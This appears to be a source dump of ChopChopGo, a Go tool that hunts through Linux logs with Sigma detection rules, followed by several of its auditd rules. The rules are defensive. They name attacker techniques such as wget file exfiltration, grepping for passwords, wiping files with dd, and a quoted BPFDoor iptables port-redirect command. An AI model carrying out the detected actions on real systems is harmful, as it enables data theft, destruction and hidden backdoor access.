├── LICENSE ├── Makefile ├── README.md ├── go.mod ├── go.sum ├── main.go ├── maps ├── auditd │ └── auditd.go ├── journald │ ├── journald.go │ └── stub.go └── syslog │ └── syslog.go ├── rules └── linux │ ├── auditd │ ├── lnx_auditd_audio_capture.yml │ ├── lnx_auditd_auditing_config_change.yml │ ├── lnx_auditd_binary_padding.yml │ ├── lnx_auditd_bpfdoor_file_accessed.yml │ ├── lnx_auditd_bpfdoor_port_redirect.yml │ ├── lnx_auditd_capabilities_discovery.yml │ ├── lnx_auditd_change_file_time_attr.yml │ ├── lnx_auditd_chattr_immutable_removal.yml │ ├── lnx_auditd_clipboard_collection.yml │ ├── lnx_auditd_clipboard_image_collection.yml │ ├── lnx_auditd_coinminer.yml │ ├── lnx_auditd_create_account.yml │ ├── lnx_auditd_data_compressed.yml │ ├── lnx_auditd_data_exfil_wget.yml │ ├── lnx_auditd_dd_delete_file.yml │ ├── lnx_auditd_disable_system_firewall.yml │ ├── lnx_auditd_file_or_folder_permissions.yml │ ├── lnx_auditd_find_cred_in_files.yml │ ├── lnx_auditd_hidden_binary_execution.yml │ ├── lnx_auditd_hidden_files_directories.yml │ ├── lnx_auditd_hidden_zip_files_steganography.yml │ ├── lnx_auditd_keylogging_with_pam_d.yml │ ├── lnx_auditd_ld_so_preload_mod.yml │ ├── lnx_auditd_load_module_insmod.yml │ ├── lnx_auditd_logging_config_change.yml │ ├── lnx_auditd_masquerading_crond.yml │ ├── lnx_auditd_modify_system_firewall.yml │ ├── lnx_auditd_network_service_scanning.yml │ ├── lnx_auditd_network_sniffing.yml │ ├── lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml │ ├── lnx_auditd_password_policy_discovery.yml │ ├── lnx_auditd_pers_systemd_reload.yml │ ├── lnx_auditd_screencapture_import.yml │ ├── lnx_auditd_screencaputre_xwd.yml │ ├── lnx_auditd_split_file_into_pieces.yml │ ├── lnx_auditd_steghide_embed_steganography.yml │ ├── lnx_auditd_steghide_extract_steganography.yml │ ├── lnx_auditd_susp_c2_commands.yml │ ├── lnx_auditd_susp_cmds.yml │ ├── lnx_auditd_susp_exe_folders.yml │ ├── lnx_auditd_susp_histfile_operations.yml │ ├── lnx_auditd_system_info_discovery.yml │ ├── lnx_auditd_system_info_discovery2.yml │ ├── lnx_auditd_system_shutdown_reboot.yml │ ├── lnx_auditd_systemd_service_creation.yml │ ├── lnx_auditd_unix_shell_configuration_modification.yml │ ├── lnx_auditd_unzip_hidden_zip_files_steganography.yml │ ├── lnx_auditd_user_discovery.yml │ └── lnx_auditd_web_rce.yml │ ├── builtin │ ├── auth │ │ └── lnx_auth_pwnkit_local_privilege_escalation.yml │ ├── clamav │ │ └── lnx_clamav_relevant_message.yml │ ├── cron │ │ └── lnx_cron_crontab_file_modification.yml │ ├── guacamole │ │ └── lnx_guacamole_susp_guacamole.yml │ ├── lnx_apt_equationgroup_lnx.yml │ ├── lnx_buffer_overflows.yml │ ├── lnx_clear_syslog.yml │ ├── lnx_file_copy.yml │ ├── lnx_ldso_preload_injection.yml │ ├── lnx_nimbuspwn_privilege_escalation_exploit.yml │ ├── lnx_potential_susp_ebpf_activity.yml │ ├── lnx_privileged_user_creation.yml │ ├── lnx_shell_clear_cmd_history.yml │ ├── lnx_shell_susp_commands.yml │ ├── lnx_shell_susp_log_entries.yml │ ├── lnx_shell_susp_rev_shells.yml │ ├── lnx_shellshock.yml │ ├── lnx_space_after_filename_.yml │ ├── lnx_susp_dev_tcp.yml │ ├── lnx_susp_jexboss.yml │ ├── lnx_symlink_etc_passwd.yml │ ├── sshd │ │ ├── lnx_sshd_ssh_cve_2018_15473.yml │ │ └── lnx_sshd_susp_ssh.yml │ ├── sudo │ │ └── lnx_sudo_cve_2019_14287_user.yml │ ├── syslog │ │ ├── lnx_syslog_security_tools_disabling_syslog.yml │ │ └── lnx_syslog_susp_named.yml │ └── vsftpd │ │ └── lnx_vsftpd_susp_error_messages.yml │ ├── file_event │ ├── file_event_lnx_doas_conf_creation.yml │ ├── file_event_lnx_persistence_cron_files.yml │ ├── file_event_lnx_persistence_sudoers_files.yml │ ├── file_event_lnx_susp_shell_script_under_profile_directory.yml │ ├── file_event_lnx_triple_cross_rootkit_lock_file.yml │ ├── file_event_lnx_triple_cross_rootkit_persistence.yml │ └── file_event_lnx_wget_download_file_in_tmp_dir.yml │ ├── network_connection │ ├── net_connection_lnx_back_connect_shell_dev.yml │ ├── net_connection_lnx_crypto_mining_indicators.yml │ └── net_connection_lnx_ngrok_tunnel.yml │ └── process_creation │ ├── proc_creation_lnx_at_command.yml │ ├── proc_creation_lnx_base64_decode.yml │ ├── proc_creation_lnx_base64_execution.yml │ ├── proc_creation_lnx_base64_shebang_cli.yml │ ├── proc_creation_lnx_bash_interactive_shell.yml │ ├── proc_creation_lnx_bpf_kprob_tracing_enabled.yml │ ├── proc_creation_lnx_bpftrace_unsafe_option_usage.yml │ ├── proc_creation_lnx_capa_discovery.yml │ ├── proc_creation_lnx_cat_sudoers.yml │ ├── proc_creation_lnx_chattr_immutable_removal.yml │ ├── proc_creation_lnx_clear_logs.yml │ ├── proc_creation_lnx_clear_syslog.yml │ ├── proc_creation_lnx_clipboard_collection.yml │ ├── proc_creation_lnx_cp_passwd_or_shadow_tmp.yml │ ├── proc_creation_lnx_crontab_enumeration.yml │ ├── proc_creation_lnx_crontab_removal.yml │ ├── proc_creation_lnx_crypto_mining.yml │ ├── proc_creation_lnx_curl_usage.yml │ ├── proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml │ ├── proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml │ ├── proc_creation_lnx_dd_file_overwrite.yml │ ├── proc_creation_lnx_disable_ufw.yml │ ├── proc_creation_lnx_doas_execution.yml │ ├── proc_creation_lnx_esxcli_network_discovery.yml │ ├── proc_creation_lnx_esxcli_permission_change_admin.yml │ ├── proc_creation_lnx_esxcli_storage_discovery.yml │ ├── proc_creation_lnx_esxcli_syslog_config_change.yml │ ├── proc_creation_lnx_esxcli_system_discovery.yml │ ├── proc_creation_lnx_esxcli_user_account_creation.yml │ ├── proc_creation_lnx_esxcli_vm_discovery.yml │ ├── proc_creation_lnx_esxcli_vm_kill.yml │ ├── proc_creation_lnx_esxcli_vsan_discovery.yml │ ├── proc_creation_lnx_file_and_directory_discovery.yml │ ├── proc_creation_lnx_file_deletion.yml │ ├── proc_creation_lnx_grep_os_arch_discovery.yml │ ├── proc_creation_lnx_groupdel.yml │ ├── proc_creation_lnx_gtfobin_apt.yml │ ├── proc_creation_lnx_gtfobin_vim.yml │ ├── proc_creation_lnx_install_root_certificate.yml │ ├── proc_creation_lnx_install_suspicioua_packages.yml │ ├── proc_creation_lnx_iptables_flush_ufw.yml │ ├── proc_creation_lnx_kill_process.yml │ ├── proc_creation_lnx_local_account.yml │ ├── proc_creation_lnx_local_groups.yml │ ├── proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml │ ├── proc_creation_lnx_mkfifo_named_pipe_creation.yml │ ├── proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml │ ├── proc_creation_lnx_mount_hidepid.yml │ ├── proc_creation_lnx_netcat_reverse_shell.yml │ ├── proc_creation_lnx_nohup.yml │ ├── proc_creation_lnx_nohup_susp_execution.yml │ ├── proc_creation_lnx_omigod_scx_runasprovider_executescript.yml │ ├── proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml │ ├── proc_creation_lnx_perl_reverse_shell.yml │ ├── proc_creation_lnx_php_reverse_shell.yml │ ├── proc_creation_lnx_process_discovery.yml │ ├── proc_creation_lnx_proxy_connection.yml │ ├── proc_creation_lnx_python_pty_spawn.yml │ ├── proc_creation_lnx_python_reverse_shell.yml │ ├── proc_creation_lnx_remote_system_discovery.yml │ ├── proc_creation_lnx_remove_package.yml │ ├── proc_creation_lnx_ruby_reverse_shell.yml │ ├── proc_creation_lnx_schedule_task_job_cron.yml │ ├── proc_creation_lnx_security_software_discovery.yml │ ├── proc_creation_lnx_security_tools_disabling.yml │ ├── proc_creation_lnx_services_stop_and_disable.yml │ ├── proc_creation_lnx_setgid_setuid.yml │ ├── proc_creation_lnx_ssm_agent_abuse.yml │ ├── proc_creation_lnx_sudo_cve_2019_14287.yml │ ├── proc_creation_lnx_susp_chmod_directories.yml │ ├── proc_creation_lnx_susp_container_residence_discovery.yml │ ├── proc_creation_lnx_susp_curl_fileupload.yml │ ├── proc_creation_lnx_susp_curl_useragent.yml │ ├── proc_creation_lnx_susp_dockerenv_recon.yml │ ├── proc_creation_lnx_susp_execution_tmp_folder.yml │ ├── proc_creation_lnx_susp_find_execution.yml │ ├── proc_creation_lnx_susp_git_clone.yml │ ├── proc_creation_lnx_susp_history_delete.yml │ ├── proc_creation_lnx_susp_history_recon.yml │ ├── proc_creation_lnx_susp_hktl_execution.yml │ ├── proc_creation_lnx_susp_inod_listing.yml │ ├── proc_creation_lnx_susp_interactive_bash.yml │ ├── proc_creation_lnx_susp_java_children.yml │ ├── proc_creation_lnx_susp_network_utilities_execution.yml │ ├── proc_creation_lnx_susp_pipe_shell.yml │ ├── proc_creation_lnx_susp_recon_indicators.yml │ ├── proc_creation_lnx_susp_sensitive_file_access.yml │ ├── proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml │ ├── proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml │ ├── proc_creation_lnx_system_info_discovery.yml │ ├── proc_creation_lnx_system_network_connections_discovery.yml │ ├── proc_creation_lnx_system_network_discovery.yml │ ├── proc_creation_lnx_touch_susp.yml │ ├── proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml │ ├── proc_creation_lnx_triple_cross_rootkit_install.yml │ ├── proc_creation_lnx_userdel.yml │ ├── proc_creation_lnx_usermod_susp_group.yml │ ├── proc_creation_lnx_webshell_detection.yml │ ├── proc_creation_lnx_wget_download_suspicious_directory.yml │ └── proc_creation_lnx_xterm_reverse_shell.yml └── update-rules.sh /Makefile: -------------------------------------------------------------------------------- 1 | all: init generate 2 | 3 | init: 4 | @echo "Making ChopChopGo..." 5 | #add special compiler options beyond -w later, 6 | #maybe use a packer or some sort. 7 | generate: 8 | go build -ldflags "-w" . 9 | 10 | clean: 11 | @echo "done." 12 | 13 | update-rules: 14 | ./update-rules.sh 15 | 16 | windows: 17 | GOOS=windows GOARCH=amd64 go build -ldflags "-w" . 18 | 19 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/M00NLIG7/ChopChopGo 2 | 3 | go 1.18 4 | 5 | require ( 6 | github.com/M00NLIG7/go-sigma-rule-engine v0.0.0-20230307200103-5335d57313e3 7 | github.com/coreos/go-systemd/v22 v22.5.0 8 | github.com/olekukonko/tablewriter v0.0.5 9 | github.com/schollz/progressbar/v3 v3.13.0 10 | ) 11 | 12 | require ( 13 | github.com/gobwas/glob v0.2.3 // indirect 14 | github.com/mattn/go-runewidth v0.0.14 // indirect 15 | github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db // indirect 16 | github.com/rivo/uniseg v0.4.3 // indirect 17 | github.com/stretchr/testify v1.6.1 // indirect 18 | golang.org/x/sys v0.4.0 // indirect 19 | golang.org/x/term v0.4.0 // indirect 20 | gopkg.in/yaml.v2 v2.4.0 // indirect 21 | gopkg.in/yaml.v3 v3.0.1 // indirect 22 | ) 23 | -------------------------------------------------------------------------------- /maps/journald/stub.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | 3 | package journald 4 | 5 | import ( 6 | "log" 7 | ) 8 | 9 | func Chop(rulePath string, outputType string) interface{} { 10 | log.Fatalf("Access to journald is not supported on Windows!") 11 | return nil 12 | } 13 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_audio_capture.yml: -------------------------------------------------------------------------------- 1 | title: Audio Capture 2 | id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5 3 | status: test 4 | description: Detects attempts to record audio with arecord utility 5 | references: 6 | - https://linux.die.net/man/1/arecord 7 | - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa 8 | author: 'Pawel Mazur' 9 | date: 2021/09/04 10 | modified: 2022/10/09 11 | tags: 12 | - attack.collection 13 | - attack.t1123 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: EXECVE 20 | a0: arecord 21 | a1: '-vv' 22 | a2: '-fdat' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_auditing_config_change.yml: -------------------------------------------------------------------------------- 1 | title: Auditing Configuration Changes on Linux Host 2 | id: 977ef627-4539-4875-adf4-ed8f780c4922 3 | status: test 4 | description: Detect changes in auditd configuration files 5 | references: 6 | - https://github.com/Neo23x0/auditd/blob/master/audit.rules 7 | - Self Experience 8 | author: Mikhail Larin, oscd.community 9 | date: 2019/10/25 10 | modified: 2021/11/27 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.006 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: PATH 20 | name: 21 | - /etc/audit/* 22 | - /etc/libaudit.conf 23 | - /etc/audisp/* 24 | condition: selection 25 | fields: 26 | - exe 27 | - comm 28 | - key 29 | falsepositives: 30 | - Legitimate administrative activity 31 | level: high 32 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_binary_padding.yml: -------------------------------------------------------------------------------- 1 | title: Binary Padding - Linux 2 | id: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba 3 | status: test 4 | description: | 5 | Adversaries may use binary padding to add junk data and change the on-disk representation of malware. 6 | This rule detect using dd and truncate to add a junk data to file. 7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md 9 | author: Igor Fits, oscd.community 10 | date: 2020/10/13 11 | modified: 2023/05/03 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1027.001 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection_execve: 20 | type: 'EXECVE' 21 | keywords_truncate: 22 | '|all': 23 | - 'truncate' 24 | - '-s' 25 | keywords_dd: 26 | '|all': 27 | - 'dd' 28 | - 'if=' 29 | keywords_filter: 30 | - 'of=' 31 | condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter)) 32 | falsepositives: 33 | - Unknown 34 | level: high 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml: -------------------------------------------------------------------------------- 1 | title: BPFDoor Abnormal Process ID or Lock File Accessed 2 | id: 808146b2-9332-4d78-9416-d7e47012d83d 3 | status: test 4 | description: detects BPFDoor .lock and .pid files access in temporary file storage facility 5 | references: 6 | - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ 7 | - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor 8 | author: Rafal Piasecki 9 | date: 2022/08/10 10 | tags: 11 | - attack.execution 12 | - attack.t1106 13 | - attack.t1059 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: 'PATH' 20 | name: 21 | - /var/run/haldrund.pid 22 | - /var/run/xinetd.lock 23 | - /var/run/kdevrund.pid 24 | condition: selection 25 | falsepositives: 26 | - Unlikely 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml: -------------------------------------------------------------------------------- 1 | title: Bpfdoor TCP Ports Redirect 2 | id: 70b4156e-50fc-4523-aa50-c9dddf1993fc 3 | status: test 4 | description: | 5 | All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' 6 | The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only. 7 | references: 8 | - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ 9 | - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor 10 | author: Rafal Piasecki 11 | date: 2022/08/10 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1562.004 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | cmd: 20 | type: 'EXECVE' 21 | a0|endswith: 'iptables' 22 | a1: '-t' 23 | a2: 'nat' 24 | keywords: 25 | - '--to-ports 42' 26 | - '--to-ports 43' 27 | condition: cmd and keywords 28 | falsepositives: 29 | - Legitimate ports redirect 30 | level: medium 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_capabilities_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Linux Capabilities Discovery 2 | id: fe10751f-1995-40a5-aaa2-c97ccb4123fe 3 | status: test 4 | description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges. 5 | references: 6 | - https://man7.org/linux/man-pages/man8/getcap.8.html 7 | - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ 8 | - https://mn3m.info/posts/suid-vs-capabilities/ 9 | - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 10 | author: 'Pawel Mazur' 11 | date: 2021/11/28 12 | modified: 2022/12/25 13 | tags: 14 | - attack.collection 15 | - attack.privilege_escalation 16 | - attack.t1123 17 | - attack.t1548 18 | logsource: 19 | product: linux 20 | service: auditd 21 | detection: 22 | selection: 23 | type: EXECVE 24 | a0: getcap 25 | a1: '-r' 26 | a2: '/' 27 | condition: selection 28 | falsepositives: 29 | - Unknown 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_change_file_time_attr.yml: -------------------------------------------------------------------------------- 1 | title: File Time Attribute Change - Linux 2 | id: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b 3 | status: test 4 | description: Detect file time attribute change to hide new or changes to existing files. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md 7 | author: 'Igor Fits, oscd.community' 8 | date: 2020/10/15 9 | modified: 2022/11/28 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.006 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | execve: 18 | type: 'EXECVE' 19 | touch: 20 | - 'touch' 21 | selection2: 22 | - '-t' 23 | - '-acmr' 24 | - '-d' 25 | - '-r' 26 | condition: execve and touch and selection2 27 | falsepositives: 28 | - Unknown 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml: -------------------------------------------------------------------------------- 1 | title: Remove Immutable File Attribute - Auditd 2 | id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 3 | status: test 4 | description: Detects removing immutable file attribute. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md 7 | author: Jakob Weinzettl, oscd.community 8 | date: 2019/09/23 9 | modified: 2022/11/26 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1222.002 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | a0|contains: 'chattr' 20 | a1|contains: '-i' 21 | condition: selection 22 | falsepositives: 23 | - Administrator interacting with immutable files (e.g. for instance backups). 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_clipboard_collection.yml: -------------------------------------------------------------------------------- 1 | title: Clipboard Collection with Xclip Tool - Auditd 2 | id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf 3 | status: test 4 | description: | 5 | Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. 6 | Xclip has to be installed. 7 | Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. 8 | references: 9 | - https://linux.die.net/man/1/xclip 10 | - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ 11 | author: 'Pawel Mazur' 12 | date: 2021/09/24 13 | modified: 2022/11/26 14 | tags: 15 | - attack.collection 16 | - attack.t1115 17 | logsource: 18 | product: linux 19 | service: auditd 20 | detection: 21 | selection: 22 | type: EXECVE 23 | a0: xclip 24 | a1: 25 | - '-selection' 26 | - '-sel' 27 | a2: 28 | - clipboard 29 | - clip 30 | a3: '-o' 31 | condition: selection 32 | falsepositives: 33 | - Legitimate usage of xclip tools 34 | level: low 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml: -------------------------------------------------------------------------------- 1 | title: Clipboard Collection of Image Data with Xclip Tool 2 | id: f200dc3f-b219-425d-a17e-c38467364816 3 | status: test 4 | description: | 5 | Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. 6 | Xclip has to be installed. 7 | Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. 8 | references: 9 | - https://linux.die.net/man/1/xclip 10 | author: 'Pawel Mazur' 11 | date: 2021/10/01 12 | modified: 2022/10/09 13 | tags: 14 | - attack.collection 15 | - attack.t1115 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection: 21 | type: EXECVE 22 | a0: xclip 23 | a1: 24 | - '-selection' 25 | - '-sel' 26 | a2: 27 | - clipboard 28 | - clip 29 | a3: '-t' 30 | a4|startswith: 'image/' 31 | a5: '-o' 32 | condition: selection 33 | falsepositives: 34 | - Legitimate usage of xclip tools 35 | level: low 36 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_coinminer.yml: -------------------------------------------------------------------------------- 1 | title: Possible Coin Miner CPU Priority Param 2 | id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed 3 | status: test 4 | description: Detects command line parameter very often used with coin miners 5 | references: 6 | - https://xmrig.com/docs/miner/command-line-options 7 | author: Florian Roth (Nextron Systems) 8 | date: 2021/10/09 9 | modified: 2022/12/25 10 | tags: 11 | - attack.privilege_escalation 12 | - attack.t1068 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | cmd1: 18 | a1|startswith: '--cpu-priority' 19 | cmd2: 20 | a2|startswith: '--cpu-priority' 21 | cmd3: 22 | a3|startswith: '--cpu-priority' 23 | cmd4: 24 | a4|startswith: '--cpu-priority' 25 | cmd5: 26 | a5|startswith: '--cpu-priority' 27 | cmd6: 28 | a6|startswith: '--cpu-priority' 29 | cmd7: 30 | a7|startswith: '--cpu-priority' 31 | condition: 1 of cmd* 32 | falsepositives: 33 | - Other tools that use a --cpu-priority flag 34 | level: critical 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_create_account.yml: -------------------------------------------------------------------------------- 1 | title: Creation Of An User Account 2 | id: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512 3 | status: test 4 | description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. 5 | references: 6 | - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files 7 | - https://access.redhat.com/articles/4409591#audit-record-types-2 8 | - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07 9 | author: Marie Euler, Pawel Mazur 10 | date: 2020/05/18 11 | modified: 2022/12/20 12 | tags: 13 | - attack.t1136.001 14 | - attack.persistence 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection_syscall_record_type: 20 | type: 'SYSCALL' 21 | exe|endswith: '/useradd' 22 | selection_add_user_record_type: 23 | type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos 24 | condition: 1 of selection_* 25 | falsepositives: 26 | - Admin activity 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_data_compressed.yml: -------------------------------------------------------------------------------- 1 | title: Data Compressed 2 | id: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee 3 | status: test 4 | description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md 7 | author: Timur Zinniatullin, oscd.community 8 | date: 2019/10/21 9 | modified: 2023/07/28 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1560.001 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection1: 18 | type: 'execve' 19 | a0: 'zip' 20 | selection2: 21 | type: 'execve' 22 | a0: 'gzip' 23 | a1: '-k' 24 | selection3: 25 | type: 'execve' 26 | a0: 'tar' 27 | a1|contains: '-c' 28 | condition: 1 of selection* 29 | falsepositives: 30 | - Legitimate use of archiving tools by legitimate user. 31 | level: low 32 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_data_exfil_wget.yml: -------------------------------------------------------------------------------- 1 | title: Data Exfiltration with Wget 2 | id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc 3 | status: test 4 | description: | 5 | Detects attempts to post the file with the usage of wget utility. 6 | The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. 7 | references: 8 | - https://linux.die.net/man/1/wget 9 | - https://gtfobins.github.io/gtfobins/wget/ 10 | author: 'Pawel Mazur' 11 | date: 2021/11/18 12 | modified: 2022/12/25 13 | tags: 14 | - attack.exfiltration 15 | - attack.t1048.003 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection: 21 | type: EXECVE 22 | a0: wget 23 | a1|startswith: '--post-file=' 24 | condition: selection 25 | falsepositives: 26 | - Legitimate usage of wget utility to post a file 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_dd_delete_file.yml: -------------------------------------------------------------------------------- 1 | title: Overwriting the File with Dev Zero or Null 2 | id: 37222991-11e9-4b6d-8bdf-60fbe48f753e 3 | status: stable 4 | description: Detects overwriting (effectively wiping/deleting) of a file. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md 7 | author: Jakob Weinzettl, oscd.community 8 | date: 2019/10/23 9 | tags: 10 | - attack.impact 11 | - attack.t1485 12 | logsource: 13 | product: linux 14 | service: auditd 15 | detection: 16 | selection: 17 | type: 'EXECVE' 18 | a0|contains: 'dd' 19 | a1|contains: 20 | - 'if=/dev/null' 21 | - 'if=/dev/zero' 22 | condition: selection 23 | falsepositives: 24 | - Appending null bytes to files. 25 | - Legitimate overwrite of files. 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_disable_system_firewall.yml: -------------------------------------------------------------------------------- 1 | title: Disable System Firewall 2 | id: 53059bc0-1472-438b-956a-7508a94a91f0 3 | status: test 4 | description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md 7 | - https://firewalld.org/documentation/man-pages/firewall-cmd.html 8 | author: 'Pawel Mazur' 9 | date: 2022/01/22 10 | tags: 11 | - attack.t1562.004 12 | - attack.defense_evasion 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'SERVICE_STOP' 19 | unit: 20 | - 'firewalld' 21 | - 'iptables' 22 | - 'ufw' 23 | condition: selection 24 | falsepositives: 25 | - Admin activity 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml: -------------------------------------------------------------------------------- 1 | title: File or Folder Permissions Change 2 | id: 74c01ace-0152-4094-8ae2-6fd776dd43e5 3 | status: test 4 | description: Detects file and folder permission changes. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md 7 | author: Jakob Weinzettl, oscd.community 8 | date: 2019/09/23 9 | modified: 2021/11/27 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1222.002 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | a0|contains: 20 | - 'chmod' 21 | - 'chown' 22 | condition: selection 23 | falsepositives: 24 | - User interacting with files permissions (normal/daily behaviour). 25 | level: low 26 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_find_cred_in_files.yml: -------------------------------------------------------------------------------- 1 | title: Credentials In Files - Linux 2 | id: df3fcaea-2715-4214-99c5-0056ea59eb35 3 | status: test 4 | description: 'Detecting attempts to extract passwords with grep' 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md 7 | author: 'Igor Fits, oscd.community' 8 | date: 2020/10/15 9 | modified: 2023/04/30 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552.001 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | keywords: 20 | '|all': 21 | - 'grep' 22 | - 'password' 23 | condition: selection and keywords 24 | falsepositives: 25 | - Unknown 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml: -------------------------------------------------------------------------------- 1 | title: Use Of Hidden Paths Or Files 2 | id: 9e1bef8d-0fff-46f6-8465-9aa54e128c1e 3 | related: 4 | - id: 